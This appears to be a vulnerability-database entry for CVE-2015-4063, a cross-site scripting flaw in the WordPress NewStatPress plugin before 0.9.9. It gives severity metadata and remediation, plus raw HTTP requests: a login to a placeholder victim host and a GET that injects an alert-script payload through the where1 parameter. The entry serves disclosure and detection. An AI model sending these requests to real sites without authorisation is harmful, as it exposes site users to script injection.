| Title | NewStatPress <0.9.9 - Cross-Site Scripting |
|---|---|
| Author | r3Y3r53 |
| Severity | Low |
| Impact | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. |
| Remediation | Update to plugin version 0.9.9 or latest. |
| CVSS Score | 3.5 |
| EPSS Score | 0.03197 |
| CVE ID | CVE-2015-4063 |
| CWE ID | CWE-79 |
| Tags | cve2015 cve xss wordpress wp-plugin wp newstatpress packetstorm newstatpress_project vuln authenticated |
WordPress NewStatPress plugin before 0.9.9 contains a cross-site scripting vulnerability in includes/nsp_search.php. The plugin allows remote authenticated users to inject arbitrary web script or HTML via the where1 parameter in the nsp_search page to wp-admin/admin.php.
POST /wp-login.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Content-Length: 38
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
log=3FZKLW&pwd=0wOy4F&wp-submit=Log+In
GET /wp-admin/admin.php?where1=<script>alert(document.domain)</script>&searchsubmit=Buscar&page=nsp_search HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Connection: close
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2015/CVE-2015-4063.yaml
🦈 Packet Capture: ⬇️ Download cve-2015-4063.pcap
N/AN/A